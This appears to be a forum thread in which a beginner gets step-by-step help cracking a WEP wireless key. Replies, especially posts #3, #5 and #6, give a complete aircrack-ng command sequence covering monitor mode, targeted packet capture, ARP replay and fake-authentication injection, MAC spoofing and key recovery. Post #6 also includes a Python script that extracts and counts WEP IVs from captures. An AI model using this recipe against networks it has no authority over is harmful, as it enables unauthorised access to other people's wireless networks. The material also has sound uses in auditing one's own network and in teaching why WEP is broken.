
Thread: I've tried everything...Help please

  1. #1
    Just burned his ISO, joined Jul 2009, 4 posts

    I've tried everything...Help please

    I am a noob when it comes to Linux and command line. (I am trying my best to learn with no success)

    Now that that's said, I have read a hundred tutorials trying to crack WEP. With every attempt I crash and burn. I first started with Ubuntu using aircrack-ng and kismet (which is where I ran into the channel hopping problem). Then after days of trying several different tutorials I gave up, declaring my iwl3945 chipset was the problem, and I ordered a Rosewill USB adapter with an r8187 chipset. From there I still couldn't figure out the channel hopping issue and decided BackTrack might be easier. Well, I was wrong again. For starters I can't get kismet to work (it's probably not configured and I don't know how). I have two wireless adapters and don't know which to use. I have no idea how to do this, given that I never progressed much past monitor mode and failed miserably at that too. I have been trying this for two weeks without success.

    If I could get one of you geniuses to walk me through all of this it would be greatly appreciated.

  2. #2
    Very good friend of the forum Gitsnik, joined Jan 2010, location The Crystal Wind, 851 posts

    Go back to your Ubuntu, use a dumping program which is part of the aircrack suite rather than kismet, specifically the -c switch for it, and then go follow one of the hundreds of videos on Google.

    Removal of the channel hopping should solve most of your issues. Don't forget monitor mode.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Junior Member, joined Feb 2007, 74 posts

    Start with airmon-ng. This will display both wireless adapters and their subsequent chipsets, from here you should be able to see which one is the rosewill. Set that one to monitor:
    Code:
    airmon-ng start [device]
    This will start the device in monitor mode.

    From here you can run airodump-ng:

    Code:
    airodump-ng [device]
    Once you've found the BSSID you're trying to crack, press ctrl+c to return to the prompt so you can narrow down to just that BSSID and the channel it resides on (shown in the airodump headers). To do this, do something like:

    Code:
    airodump-ng [device] --bssid [router mac address] -w [filename] -c [channel]
    This will lock the BSSID and the channel it's on, which will help your hopping problems. It will also write all the IVs you receive to [filename]-01.cap in the current directory you ran airodump-ng from. From here you can begin to run your aireplay attacks. I suggest looking in the how-to and tutorial sections of the forum here; there are numerous examples of how to go from here.

  4. #4
    Dooms_day, Guest

    I used aireplay-ng to ping a router for unique IVs, then used airodump-ng at the same time on the one channel and one SSID (by default it hops over many channels). I ran them both all night on a laptop, and by the time I got 500k IVs I cracked it with aircrack-ng in two seconds,

    and that was my first wep crack

  5. #5
    Just burned his ISO, joined Jul 2009, 4 posts

    Ok, I finally did it, I'm not sure what I did right, but I did it. But I only used the r8187 chipset.

    Btw, thanks Aspekt9

    So what I did was:

    To enter monitor mode
    1. airmon-ng start (device)

    To find the network name and mac
    2. airodump-ng (device)

    To find my mac
    3.ifconfig

    ?
    4. airodump-ng (device) --bssid (router mac) -w (filename) -c (channel)

    ?
    5.xterm -hold -e "aireplay-ng -3 -b (router mac) -h (my mac) (device)" &

    ?
    6. xterm -hold -e "aireplay-ng -1 6000 -o 1 -q 10 -e '(network name)' -a (router mac) -h (my mac) (device)" &


    To crack the code (I guess)???
    7. xterm -hold -e "aircrack-ng -z (filename)*cap" &


    And there was the key to my network

    Could y'all do me a big favor and help clean this up, and explain what I did?

    I greatly appreciate everyone's help so far and would greatly appreciate any further help.....

  6. #6
    Junior Member, joined Feb 2007, 74 posts

    So to summarize using your steps:

    This command puts the device in monitor mode so we can monitor incoming IVs:

    Code:
    airmon-ng start [device]
    To find the network name and BSSID (router mac address):

    Code:
    airodump-ng [device]
    To find the source (our) mac address:

    Code:
    ifconfig or macchanger --show [device]
    Note: to cut down on time having to memorize or copy and paste the mac address all the time, we can change our mac before entering monitor mode by using

    Code:
    macchanger --mac 00:11:22:33:44:55 [device]
    To lock onto our BSSID and the channel our BSSID is on, as well as write all the incoming IVs to a file, we use the following command:

    Code:
    airodump-ng [device] --bssid [router mac] -w [filename] -c [channel]
    Replay packets from a wireless client which is currently associated with the AP (which is us since this is a clientless attack) and attempt to generate new IVs.

    Code:
    aireplay-ng -3 -b [router mac] -h [my mac] [device]
    Since this is a clientless attack, we need to be sure we're associated to the AP that we're trying to generate IVs from, to do this we use Fake Authentication to authenticate us to the AP:

    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]

    To crack the key we use:

    Code:
    aircrack-ng -z (filename)*cap
    Note: you can also specify -n 64,128 depending on the key length (128 is the default).
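    The posts above count "IVs" without saying what is actually being counted. As an added example (not from this thread or from the aircrack-ng project), the parser below pulls the cleartext WEP initialization vector out of each protected 802.11 data frame in a pcap and reports how many distinct values one AP has used; since the IV is only 24 bits, the same values come back around quickly, which is the weakness these tools rely on. The pcap layout and the sample frames and MAC addresses are constructed for the example.

```python
import struct

LINKTYPE_IEEE802_11 = 105  # pcap link type for raw 802.11 frames (no radiotap header)
IV_SPACE = 1 << 24         # a WEP IV is only 24 bits, so values start repeating quickly

def iter_pcap_frames(data):
    # Yield each record of a little-endian pcap holding raw 802.11 frames.
    if struct.unpack("<I", data[:4])[0] != 0xA1B2C3D4 or struct.unpack("<I", data[20:24])[0] != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian pcap with link type 105")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack("<IIII", data[off:off + 16])[2]  # ts_sec, ts_usec, incl_len, orig_len
        off += 16
        yield data[off:off + incl_len]
        off += incl_len

def wep_iv(frame):
    """Return (bssid, 3-byte iv) for a WEP-protected data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != 0x08 or not fc1 & 0x40:  # needs type=data and the Protected flag
        return None
    to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
    if to_ds and from_ds:  # 4-address WDS frame, not handled here
        return None
    bssid = frame[4:10] if to_ds else frame[10:16] if from_ds else frame[16:22]  # addr1 / addr2 / addr3
    hdr = 24 + (2 if fc0 & 0x80 else 0)  # QoS data subtypes carry a 2-byte QoS control field
    return bssid, frame[hdr:hdr + 3]  # the IV is sent in the clear right after the MAC header

def iv_stats(pcap_bytes, bssid):
    # Count protected data frames and distinct IVs seen for one BSSID.
    frames, ivs = 0, set()
    for fr in iter_pcap_frames(pcap_bytes):
        hit = wep_iv(fr)
        if hit and hit[0] == bssid:
            frames += 1
            ivs.add(hit[1])
    return {"frames": frames, "unique_ivs": len(ivs), "iv_space_used": len(ivs) / IV_SPACE}

# Constructed sample: three WEP frames for one AP (one IV repeated) plus an unprotected beacon.
AP, STA = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
def _wep_frame(iv):  # FromDS data frame: addr1=STA, addr2=BSSID, addr3=BSSID, then IV, key id, body, ICV
    return bytes([0x08, 0x42, 0, 0]) + STA + AP + AP + b"\0\0" + iv + b"\0" + b"\0" * 12
def _pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(fr), len(fr)) + fr
    return out
SAMPLE_PCAP = _pcap([_wep_frame(b"\x01\x02\x03"), _wep_frame(b"\x01\x02\x03"),
                     _wep_frame(b"\x01\x02\x04"), bytes([0x80, 0x00]) + b"\0" * 30])
```

    Run `iv_stats(SAMPLE_PCAP, AP)` to see 3 frames but only 2 unique IVs; airodump-ng's #Data column counts frames, while the cracker cares about the distinct IVs.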

  7. #7
    Just burned his ISO, joined Jul 2009, 4 posts

    Thanks again.

    Now I have another question. In lots of tutorials I have read there isn't much explanation of how long you run this:
    Code:
    airodump-ng [device] --bssid [router mac] -w [filename] -c [channel]
    And do you close it with ctrl+c or just let it run till you've cracked the code?

    I'm wondering the same about this:
    Code:
    aireplay-ng -3 -b [router mac] -h [my mac] [device]
    And on this one you only have to run it till you get successful authentication right?
    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]

  8. #8
    Just burned his ISO, joined Jul 2009, 4 posts

    Ok, so I think I figured it out after playing with it a little bit. So you run the airodump and both the aireplay commands at the same time to capture the IVs? Without the fake authentication it will capture the IVs, but it does so really slowly.

  9. #9
    Super Moderator Archangel-Amael, joined Jan 2010, location Somewhere, 8,012 posts

    Quote Originally Posted by kraziejason:
    > Ok, so I think I figured it out after playing with it a little bit. So you run the airodump and both the aireplay commands at the same time to capture the IVs? Without the fake authentication it will capture the IVs, but it does so really slowly.

    Everyone is telling you to start with this or start with that, but not one has bothered to mention that you should start with the manual pages.
    The actual instructions from the app devs. It will really make a huge difference if you take 20-30 minutes to read and understand what is going on.
    tutorial [Aircrack-ng]
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  10. #10
    Just burned his ISO, joined Aug 2009, 1 post

    Linux is really confusing for me too.
